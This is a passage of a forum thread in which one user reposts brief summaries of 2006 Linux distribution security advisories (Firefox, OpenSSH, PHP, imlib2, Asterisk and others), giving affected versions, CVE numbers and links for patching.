Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-ftp/ftpd < 0.17-r4 >= 0.17-r4
*

http://www.linuxsecurity.com/content/view/125687/170/

eddie


----------



## eddie5659

M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user were tricked into viewing or processing a specially crafted image with an application that uses imlib2, the flaws could be exploited to execute arbitrary code with the user's privileges. Fedora Extras versions earlier then the versions mentioned above are vulnerable to this problem, upgrade to fix this vulnerability.

*Version: 1.2.1-2 [FE 3 4], 1.3.0-3 [FE 5 6 devel]
*

http://www.linuxsecurity.com/content/view/125656/170/

eddie


----------



## eddie5659

Mozilla Firefox is an open source Web browser. Several flaws were found in the way Firefox processes certain malformed Javascript code. A malicious web page could cause the execution of Javascript code in such a way that could cause Firefox to crash or execute arbitrary code as the user running Firefox. Several flaws were found in the way Firefox renders web pages. A malicious web page could cause the browser to crash or possibly execute arbitrary code as the user running Firefox.

*Product : Fedora Core 5
Name : firefox
Version : 1.5.0.8
*

http://www.linuxsecurity.com/content/view/125654/170/

eddie


----------



## eddie5659

New to this release is our SELinux Control Console. This WebTool module gives you greater control over EnGarde's kernel-level security policies by allowing you to monitor security audit logs; enable and disable policy enforcement; download new policies to your server; trigger a relabeling of the file system

The release also contains our new context-sensitive WebTool help system and upgrades to many major applications including Apache, Postfix, and Snort.

*(Version 3.0, Release 10).

*

http://www.linuxsecurity.com/content/view/125612/170/

eddie


----------



## eddie5659

Steve Rigler discovered that the PAM module for authentication against LDAP servers processes PasswordPolicyReponse control messages incorrectly, which might lead to an attacker being able to login into a suspended system account.

http://www.linuxsecurity.com/content/view/125542/170/

eddie


----------



## eddie5659

It was discovered that the Ingo email filter rules manager performs insufficient escaping of user-provided data in created procmail rules files, which allows the execution of arbitrary shell commands.

http://www.linuxsecurity.com/content/view/125549/170/

eddie


----------



## eddie5659

Marco d'Itri discovered that thttpd, a small, fast and secure webserver, makes use of insecure temporary files when its logfiles are rotated, which might lead to a denial of service through a symlink attack.

http://www.linuxsecurity.com/content/view/125557/170/

eddie


----------



## eddie5659

Several remote vulnerabilities have been discovered in PHP, a server-side, HTML-embedded scripting language, which may lead to the execution of arbitrary code

http://www.linuxsecurity.com/content/view/125592/170/

eddie


----------



## eddie5659

Several remote vulnerabilities have been discovered in phpMyAdmin, a program to administrate MySQL over the web.

http://www.linuxsecurity.com/content/view/125670/170/

eddie


----------



## eddie5659

Various problems have been fixed in the network analyzer Ethereal (now called Wireshark), most of them leading to crashes of the ethereal program.

*Affected Products: Novell Linux POS 9
Open Enterprise Server
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SuSE Linux Enterprise Server 8
SuSE Linux Openexchange Server 4
SUSE LINUX Retail Solution 8
SuSE Linux School Server
SuSE Linux Standard Server 8
SUSE SLED 10
SUSE SLES 10
SUSE SLES 9
UnitedLinux 1.0
*

http://www.linuxsecurity.com/content/view/125759/170/

eddie


----------



## eddie5659

Two security problems were found in the GraphicsMagick tool set which are also present in ImageMagick

*Affected Products: Novell Linux Desktop 9
SLE SDK 10
SLES SDK 9
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SuSE Linux Desktop 1.0
SuSE Linux Openexchange Server 4
SuSE Linux School Server
SuSE Linux Standard Server 8
SUSE SLED 10
*

http://www.linuxsecurity.com/content/view/125760/170/

eddie


----------



## eddie5659

Several security related problems have been discovered in Mozilla and derived products such as Mozilla Firefox

*Package : mozilla-firefox
*

http://www.linuxsecurity.com/content/view/125758/170/

eddie


----------



## eddie5659

Various buffer overflows in htmlentities / htmlspecialchars internal routines could be used to crash the PHP interpreter or potentially execute code, depending on the PHP application used.

*Affected Products: Novell Linux POS 9
Open Enterprise Server
SLE SDK 10
SUSE LINUX 10.1
 SUSE LINUX 10.0
SUSE LINUX 9.3
SuSE Linux Enterprise Server 8
SuSE Linux Openexchange Server 4
SUSE LINUX Retail Solution 8
SuSE Linux School Server
SuSE Linux Standard Server 8
SUSE SLES 10
SUSE SLES 9
UnitedLinux 1.0
*

http://www.linuxsecurity.com/content/view/125770/170/

eddie


----------



## eddie5659

Updated openssh packages that fix an authentication flaw are now available for Red Hat Enterprise Linux 3 and 4. This update has been rated as having low security impact by the Red Hat Security Response Team.

*2. Relevant releases/architectures:

Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125772/170/

eddie


----------



## eddie5659

Updated nss_ldap packages that fix a security flaw are now available for Red Hat Enterprise Linux 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125771/170/

eddie


----------



## eddie5659

An unspecified vulnerability in OpenLDAP allows remote attackers to cause a denial of service (daemon crash) via a certain combination of SASL Bind requests that triggers an assertion failure in libldap. Packages have been patched to correct this issue.

http://www.linuxsecurity.com/content/view/125767/170/

eddie


----------



## eddie5659

Two denial of service vulnerabilities have been found in the OpenSSH server. CVE-2006-4924: The sshd support for ssh protcol version 1 does not properly handle duplicate incoming blocks. This could allow a remote attacker to cause sshd to consume significant CPU resources leading to a denial of service. CVE-2006-5051: A signal handler race condition could potentially allow a remote attacker to crash sshd and could theoretically lead to the ability to execute arbitrary code

http://www.linuxsecurity.com/content/view/125773/170/

eddie


----------



## eddie5659

Tavis Ormandy discovered that libpng did not correctly calculate the size of sPLT structures when reading an image. By tricking a user or an automated system into processing a specially crafted PNG file, an attacker could exploit this weakness to crash the application using the library.

*Affected software

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10
*

http://www.linuxsecurity.com/content/view/125806/170/

eddie


----------



## eddie5659

MozillaFirefox has been updated to the security update release 1.5.0.8, MozillaThunderbird has been updated to 1.5.0.8, and the Mozilla Seamonkey suite has been updated to 1.0.6 to fix the following security issues.

*Affected Products: Novell Linux Desktop 9
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE SLED 10
SUSE SLES 10
*

http://www.linuxsecurity.com/content/view/125790/170/

eddie


----------



## eddie5659

Two security problem have been found and fixed in the PBX software Asterisk. CVE-2006-5444: Integer overflow in the get_input function in the Skinny channel driver (chan_skinny.c) as used by Cisco SCCP phones, allows remote attackers to potentially execute arbitrary code via a certain dlen value that passes a signed integer comparison and leads to a heap-based buffer overflow. CVE-2006-5445: A vulnerability in the SIP channel driver (channels/chan_sip.c) in Asterisk on SUSE Linux 10.1 allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors that result in the creation of "a real pvt structure" that uses more resources than necessary

*Affected Products: SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
*

http://www.linuxsecurity.com/content/view/125791/170/

eddie


----------



## eddie5659

Two security problems that have been found in PowerDNS are fixed by this update: CVE-2006-4251: The PowerDNS Recursor can be made to crash by sending malformed questions to it over TCP potentially executing code. CVE-2006-4252: Zero second CNAME TTLs can make PowerDNS exhaust allocated stack space and crash.

*Affected Products: SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
*

http://www.linuxsecurity.com/content/view/125792/170/

eddie


----------



## eddie5659

Local exploitation of an integer overflow vulnerability in the 'CIDAFM()' function in the X.Org and XFree86 X server could allow an attacker to execute arbitrary code with privileges of the X server, typically root (CVE-2006-3739).

http://www.linuxsecurity.com/content/view/125815/170/

eddie


----------



## eddie5659

Flaws in WordPress allow a Denial of Service, the disclosure of user metadata and the overwriting of restricted files.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-apps/wordpress < 2.0.5 >= 2.0.5

*

http://www.linuxsecurity.com/content/view/125809/170/

eddie


----------



## eddie5659

USN-351-1 fixed a flaw in the verification of PKCS certificate signatures. Ulrich Kuehn discovered a variant of the original attack which the original fix did not cover. (CVE-2006-5462) Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious web page containing JavaScript. (CVE-2006-5463, CVE-2006-5464, CVE-2006-5747, CVE-2006-5748)

*Affected version

Ubuntu 5.10
Ubuntu 6.06 LTS
*

http://www.linuxsecurity.com/content/view/125861/170/

eddie


----------



## eddie5659

USN-352-1 fixed a flaw in the verification of PKCS certificate signatures. Ulrich Kuehn discovered a variant of the original attack which the original fix did not cover. (CVE-2006-5462) Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious email containing JavaScript. Please note that JavaScript is disabled by default for emails, and it is not recommended to enable it. (CVE-2006-5463, CVE-2006-5464, CVE-2006-5747, CVE-2006-5748)

*Affected versions

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10
*

http://www.linuxsecurity.com/content/view/125860/170/

eddie


----------



## eddie5659

An unspecified vulnerability in OpenLDAP allows remote attackers to cause a denial of service (daemon crash) via a certain combination of SASL Bind requests that triggers an assertion failure in libldap. Packages have been patched to correct this issue. Packages for Corp4 were built from the wrong src.rpm, breaking Heimdal Kerboros and possibly other support. Updated packages are being provided to correct this issue.

*Affected: Corporate 4.0
*

http://www.linuxsecurity.com/content/view/125867/170/

eddie


----------



## eddie5659

An off-by-one error in the der_get_oid function in mod_auth_kerb 5.0 allows remote attackers to cause a denial of service (crash) via a crafted Kerberos message that triggers a heap-based buffer overflow in the component array. Packages have been patched to correct this issue.

*Affected: Corporate 4.0
*

http://www.linuxsecurity.com/content/view/125887/170/

eddie


----------



## eddie5659

TORQUE creates temporary files in an insecure manner which could lead to the execution of arbitrary code with elevated privileges

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-cluster/torque < 2.1.2-r2 >= 2.1.2-r2*

http://www.linuxsecurity.com/content/view/125855/170/

eddie


----------



## eddie5659

qmailAdmin is vulnerable to a buffer overflow that could lead to the remote execution of arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-mail/qmailadmin < 1.2.10 >= 1.2.10

*

http://www.linuxsecurity.com/content/view/125854/170/

eddie


----------



## eddie5659

Texinfo is vulnerable to a buffer overflow that could lead to the execution of arbitrary code

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-apps/texinfo < 4.8-r5 >= 4.8-r5

*

http://www.linuxsecurity.com/content/view/125856/170/

eddie


----------



## eddie5659

A flaw in fvwm-menu-directory may permit a local attacker to execute arbitrary commands with the privileges of another user

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 x11-wm/fvwm < 2.5.18-r1 >2.5.18-r1

*

http://www.linuxsecurity.com/content/view/125886/170/

eddie


----------



## eddie5659

It was discovered that the proftpd FTP daemon performs insufficient validation of FTP command buffer size limits, which may lead to denial of service. CVEID CVE-2006-5815 is addressed by this vulnerability.

http://www.linuxsecurity.com/content/view/125858/170/

eddie


----------

